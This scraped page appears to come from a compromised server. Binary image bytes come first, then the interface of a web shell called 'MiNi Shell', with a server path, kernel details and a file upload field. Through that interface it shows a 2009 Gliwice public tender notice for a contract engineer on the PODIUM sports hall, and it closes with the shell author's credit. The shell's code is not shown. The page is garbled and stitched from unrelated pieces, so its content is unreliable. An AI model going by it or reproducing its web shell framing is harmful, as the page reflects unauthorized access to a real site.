JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101308-N-2009.html

<p class="kh_header"><b>Gliwice: Budowa hali widowiskowo-sportowej PODIUM - Inżynier Kontraktu</b><br>
<b>Numer ogłoszenia: 101308 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gliwice, Wydział Inwestycji i Remontów , ul. Zwycięstwa 21, 44-100 Gliwice, woj. śląskie, tel. +48 032 2385442, faks +48 032 2314058.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali widowiskowo-sportowej PODIUM - Inżynier Kontraktu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie roli Inżyniera Kontraktu dla całości zadania inwestycyjnego  pod nazwą  Budowa hali widowiskowo sportowej PODIUM przy ul. Akademickiej i Kujawskiej w Gliwicach, wraz z  infrastrukturą  techniczną i towarzyszącą, obiektami i budowlami towarzyszącymi oraz wjazdami i ciągami komunikacyjnymi tworzącymi razem zespół funkcjonalny PODIUM  w skład którego wchodzą :Główna hala    widowiskowo-sportowa,  hala treningowa, centrum SPA,  zewnętrzny garaż wielopoziomowy, estakada drogi  pożarowej, obiekty małej architektury oraz zagospodarowanie terenu. Charakterystyczne parametry  techniczne obiektu:  powierzchnia całkowita  69272,04 m2;  powierzchnia użytkowa  56269,75 m2;    kubatura  509881,93 m3;  widownia hali głównej do 13752 widzów; płyta do 2868 widzów;   widownia hali treningowej   do 2972 widzów)  Funkcja Inżyniera Kontraktu będzie pełniona zgodnie z warunkami  FIDIC (Czerwona Książka - Warunki Kontraktu na budowę dla robót budowlanych i inżynieryjnych projektowanych przez zamawiającego - tłumaczenie pierwszego wydania FIDIC 1999) oraz zasadami obowiązującymi dla projektów realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego.  Podstawowe obowiązki Inżyniera Kontraktu w okresie od podpisania umowy z Zamawiającym do wyboru wykonawcy robót budowlano-montażowych polegają na:  - udziale w przygotowaniu przetargu i udziale w postępowaniu przetargowym dotyczącym wyboru wykonawcy robót budowlano-montażowych. Podstawowe obowiązki Inżyniera Kontraktu w okresie od wyboru wykonawcy robót budowlano-montażowych do rozpoczęcia tych robót polegają na: - przekazaniu dokumentacji wykonawcy robót;- uzyskaniu od wykonawcy finansowego zabezpieczenia kontraktu;- przejęciu od wykonawcy uzgodnionego harmonogramu przedstawiającego cykl realizacji inwestycji;- przekazaniu wykonawcy terenu budowy;- przejęciu od wykonawcy planu płatności po uprzednim uzgodnieniu go z Zamawiającym. Podstawowe obowiązki Inżyniera Kontraktu w okresie realizacji robót budowlano -montażowych: 1. Przygotowanie i realizacja usługi zgodnie z dokumentacją projektową, wymaganiami Warunków Kontraktu na Budowę, FIDIC wydanie pierwsze z 1999 r., i przepisami prawa polskiego ze szczególnym uwzględnieniem Ustawy Prawo Budowlane z dnia 7 lipca 1994 wraz z aktualnie obowiązującymi nowelizacjami, oraz zasadami obowiązującymi dla projektów realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego; 2.Opracowanie świadectwa energetycznego dla realizowanego obiektu; 3. Monitorowanie i raportowanie, gromadzenie dokumentacji i danych pozwalających na pełną kontrolę realizacji inwestycji; 4.Rozliczenie finansowe i rzeczowe kontraktu; 5.Zarządzanie realizacją Projektu do czasu wystawienia Świadectwa Wykonania. 6.Przekazanie inwestycji do eksploatacji podmiotowi wskazanemu przez Zamawiającego, zgodnie z obowiązującymi przepisami prawa; 7.Kontynuowanie obowiązków Inżyniera Kontraktu w okresie gwarancji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 92.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium 160000 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, oraz niepodleganie wykluczeniu z postępowania o udzielenie zamówienia (podstawy prawne wykluczenia z postępowania określa art. 24 ust. 1 i 2 ustawy pzp);
w przypadku podmiotów działających wspólnie warunek dotyczący niepodlegania wykluczeniu, zgodnie z art. 24 ust. 1 i 2 ustawy Pzp, o którym mowa powyżej, muszą spełniać wszystkie podmioty działające wspólnie.
2) Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Doświadczenie zawodowe :

Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) wykonał należycie co najmniej:
- 2 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia.

Za usługę odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia zamawiający rozumie usługę, polegającą na pełnieniu funkcji nadzoru inwestorskiego lub funkcji Inżyniera Kontraktu nad wykonywaniem robót budowlanych polegających na budowie lub przebudowie obiektu użyteczności publicznej o kubaturze nie mniejszej niż 60 000 m3 i wartości robót co najmniej 50 000 000 PLN brutto, w tym minimum jedna usługa polegająca na pełnieniu funkcji Inżyniera Kontraktu zgodnie z warunkami FIDIC o wartości usługi min. 2 500 000 zł brutto;

Uwaga :

Obiekt użyteczności publicznej w rozumieniu Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r., w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie z wyłączeniem : wielkopowierzchniowych obiektów handlowych, magazynów i terminali logistycznych;

- dwie usługi polegające na opracowaniu Specyfikacji Istotnych Warunków Zamówienia na roboty budowlane dla wartości zamówienia równej lub przekraczającej wyrażoną w złotych równowartość kwoty określonej w przepisach wydanych na podstawie art. 11 ust 8 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (tj.Dz.U z 2007 r. Nr 223, poz. 1655 z późn. zm.) od których jest uzależniony obowiązek przekazywania ogłoszeń Urzędowi Publikacji Wspólnot Europejskich
- jedną usługę weryfikacji dokumentacji projektowej obiektu kubaturowego użyteczności publicznej o kubaturze nie mniejszej niż 60 000 m3.

Potencjał kadrowy:

Wykonawca musi mieć do dyspozycji osoby spełniające co najmniej określone niżej wymagania:
a) Kierownik kontraktu:
- uprawnienia o specjalności architektonicznej bez ograniczeń lub uprawnienia budowlane do kierowania i nadzorowania robót branży konstrukcyjno-budowlanej bez ograniczeń
- przynależność do właściwej izby architektów lub Inżynierów Budownictwa;
- nie mniej niż 10-letnie doświadczenie (liczone od daty uzyskania uprawnień) w pełnieniu funkcji koordynatora zespołu inspektorów/projektantów przy realizacji obiektów kubaturowych w tym min. 5-letnie doświadczenie w kierowaniu projektem;
- doświadczenie w pełnieniu funkcji Inżyniera Rezydenta, Inżyniera Kontraktu przy co najmniej jednej budowie obiektu kubaturowego użyteczności publicznej (od początku realizacji budowy do wystawienia przynajmniej świadectwa Przejęcia Robót) prowadzonej w oparciu o procedury FIDIC o wartości robót budowlanych minimum 50 000 000 PLN brutto

b) Inspektor nadzoru robót budowlanych:
- uprawnienia budowlane do kierowania i nadzorowania robót branży konstrukcyjno-budowlanej bez ograniczeń;
- przynależność do właściwej izby samorządu zawodowego;
- nie mniej niż 6-letnie doświadczenie (liczone od daty uzyskania uprawnień budowlanych) w pełnieniu funkcji inspektora nadzoru inwestorskiego w zakresie robót konstrukcyjno budowlanych przy realizacji obiektów kubaturowych; 
- doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w zakresie robót konstrukcyjno - budowlanych przy co najmniej jednej budowie obiektu kubaturowego użyteczności publicznej prowadzonej w oparciu o procedury FIDIC 
c) Inspektor nadzoru robót drogowych:
- uprawnienia budowlane do kierowania i nadzorowania robót branży drogowej bez ograniczeń;
- przynależność do właściwej izby samorządu zawodowego;
- nie mniej niż 5-letnie doświadczenie (liczone od daty uzyskania uprawnień budowlanych) w pełnieniu funkcji inspektora nadzoru inwestorskiego w zakresie robót drogowych;
- doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego w zakresie robót drogowych przy co najmniej jednej budowie/ przebudowie prowadzonej w oparciu o procedury FIDIC

d)Inspektor nadzoru robót elektroenergetycznych:
- uprawnienia budowlane do kierowania i nadzorowania robót branży elektroenergetycznej bez ograniczeń;
- przynależność do właściwej izby samorządu zawodowego;
- nie mniej niż 5-letnie doświadczenie (liczone od daty uzyskania uprawnień budowlanych) w pełnieniu funkcji inspektora nadzoru inwestorskiego w zakresie robót elektroenergetycznych w tym przy co najmniej jednej budowie obiektu użyteczności publicznej;

e) Inspektor nadzoru robót instalacyjnych:
- uprawnienia budowlane do kierowania i nadzorowania robót instalacyjnych bez ograniczeń;
- przynależność do właściwej izby samorządu zawodowego;
- nie mniej niż 5-letnie  doświadczenie (liczone od daty uzyskania uprawnień budowlanych) w pełnieniu funkcji inspektora nadzoru inwestorskiego w zakresie robót sanitarnych: wod-kan, wentylacji, ogrzewania w tym przy co najmniej jednej budowie obiektu użyteczności publicznej;



f)Inspektor nadzoru robót telekomunikacyjnych
- uprawnienia budowlane do kierowania i nadzorowania robót telekomunikacyjnych bez ograniczeń;
- przynależność do właściwej izby samorządu zawodowego;
- nie mniej niż 5-letnie doświadczenie (liczone od daty uzyskania uprawnień budowlanych) w pełnieniu funkcji inspektora nadzoru inwestorskiego w zakresie robót telekomunikacyjnych w tym przy co najmniej jednej budowie obiektu użyteczności publicznej;
g) Inspektor ds. rozliczeń:
- wykształcenie wyższe techniczne; 
- nie mniej niż 5-letnie doświadczenie w zakresie rozliczania inwestycji w tym doświadczenie przy rozliczeniu minimum jednej budowy obiektu kubaturowego użyteczności publicznej realizowanego w oparciu o procedury FIDIC o wartości robót minimum 50 000 000 PLN brutto;

W przypadku podmiotów działających wspólnie doświadczenie, potencjał techniczny i osoby zdolne do wykonania zamówienia podlegają sumowaniu

3) Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Wykonawca musi wykazać:

a)Wykonawca musi posiadać środki finansowe lub zdolność kredytową w kwocie nie mniejszej niż 600000,00 PLN;

b)średni roczny przychód za ostatnie trzy lata obrotowe a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (na podstawie Rachunku zysków i strat pozycja Przychód netto ze sprzedaży produktów, towarów i materiałów lub  Przychód netto ze sprzedaży i zrównane z nimi) w wysokości nie mniejszej niż 4 000 000,00 PLN;

c) Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 3 000 000,00 PLN

w przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlegają sumowaniu.

Ocena spełnienia wyżej wymienionych warunków dokonana zostanie w oparciu o informacje zawarte w niżej wymienionych dokumentach i oświadczeniach na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - oświadczenie o spełnieniu warunków udziału w postępowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy pzp) o treści ZAŁĄCZNIKA NR 2 do SIWZ; 
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku spółki cywilnej - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny odpis z właściwego rejestru dla każdego ze wspólników; 
- aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
- aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
- aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
- wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami potwierdzającymi spełnienie warunku udziału w postępowaniu o treści ZAŁĄCZNIKA NR 3 do SIWZ oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował; 
- dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia; 
- wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców o treści ZAŁĄCZNIKA NR 4 do SIWZ oraz załączenie dokumentów potwierdzających, że usługi te zostały wykonane należycie; 
- rachunek zysków i strat wraz z opinią biegłego rewidenta, jeżeli podlega badaniu zgodnie z przepisami o rachunkowości, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające przychody - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres; 
- informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
- polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Dokumenty składane przez wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej:

a) jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej, zamiast:
- aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, 
- aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy pzp, 
- aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- nie zalega z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
b)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w podpunkcie a), oraz aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy pzp, składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Gliwicach Biuro Obsługi Interesantów stanowisko ds zamówień publicznych, 44-100 Gliwice, ul. Zwycięstwa 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 10:00, miejsce: Urząd Miejski w Gliwicach Biuro Obsługi Interesantów stanowisko ds zamówień publicznych, 44-100 Gliwice, ul. Zwycięstwa 21.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com